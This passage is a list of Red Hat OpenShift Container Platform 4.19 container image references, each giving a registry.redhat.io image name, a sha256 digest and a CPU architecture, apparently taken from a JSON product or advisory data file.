"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:47155911d2fc258d338ee6971d5690c24a02b6c7bb3606bab4b1901824db1f6b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:6723f26e9ad3469461e1f752819e048f819faef9cbebb6ed473d08f41393256f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:7c52ab73261a98a2c979547424a9a29519b147c8bcde814b3efbdc7ace885be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-admission-controller-rhel9@sha256:b91171b9f56b994aa3bf574862cedd318db66039a1cdfb08798ee1700c0f956a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:4050f629b8d4af401707a5e0122a155bd110b6f80937a2e0cd3791a49b1deaeb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:77abdb2ebd4daa3e500f44aa6f65cd365dbc2d9d8874ca4793b9ee1a8b944b8e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:9ebe024a4484b52a59f1ed5c92db62b86e3709fc642983799ef49d2d9d8cd7ec_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-microshift-rhel9@sha256:a165973ac17958695bfe213fd4a651bb94bbd0e851fe81e97c8fe833300d8d31_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:3ab735360773e6eb8e7f35088cb7420de0b815a84ca87a9135a6cf19e97b5c93_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:97b3af6976324a521b0a6e615ce422f05dc3acee1885726abf447166939821c5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:b7f620ae9d70339b97b0719a725d8a8f398367238cfe33f312a1f0ef82afefcb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-cni-rhel9@sha256:d3cd466c6704a6f1aba413cf5cad5f551e71953adf3c0780011a60f72b4c81a7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:29e144f0cf3a9851b940809050df06a72bf01ad62938e8951b67aab956d6befe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d17917fccd90b94767a9a92d871bb54204568272946691755015410ae7c8084a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:d8cbcc5fa3ec11a2abfe5f86bb1144c2682a34774a4f87db9dc4fc0691915c41_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-networkpolicy-rhel9@sha256:eab489c24877c7868a6784cbf9534ed80125a1c4e88e1d31677ff028450d941c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:4c6d93338edf2c6e6633a530fcec5519e33b51c1c0e07558402d3aa52ef5c925_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:9b2dc7a7bf2ccc373348d47cb745507d6aae379b8b57c1ff828656476dd325c2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:aa29e3416d8bbb38417774faedd53058276393c5bd24d90bb6fcba42c60f7945_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-route-override-cni-rhel9@sha256:d2bb57710fa4b6bce2a2166507328563a79221a93e3b785652c75b10464980ab_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:581e5388025562d1814b612378873f26e27e84cb4a23a657d7a915cb02dff621_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:5b46c8f78db81e2da8ae6ab8bb08319ea90ef4cdc815c0aa87c45a706a4cfc0f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:6427aad3aec21c9f1b9b9ad6c93785247972ead44380069d38e446a79d1b1f2b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-multus-whereabouts-ipam-cni-rhel9@sha256:d23fed56ef3bfaa7b89f21cba6063cc700b6b73eebb6fb3d98077c3335dfd9fd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:05dd72d920e18f245f13a436659250ffebd4acaa3bc8ac2a1387b2059af7bb7f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:2bc055a3ef3095325cc3d8d95d6c5149e6e34586e79bb8091dd89d6c2e546c72_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:85a930f0612b1fa7d455550a04666b723bb4402fec82481abf505a3f7c791526_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-must-gather-rhel9@sha256:c3ce5331bb023bea2bb1be11730cc3582c8de4dd8f22ed52fd531ceade69be2c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:16b454a5f9768dbfb1e51f32054bf46338c89f3ee1e9828362d3f340641c8209_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:84c26c0c2915619709a25cc9d5965f87517b6e5e15ee88b377bf45d9655d3d43_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:8f08a5275631222beb361db97e56b9be7ef24f2b8c98cb0de0efbbb844d339c6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-interface-bond-cni-rhel9@sha256:d6c3459d4243d17f867d3f2a40f8f82a176597b85e49b4fb131181de4c417286_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
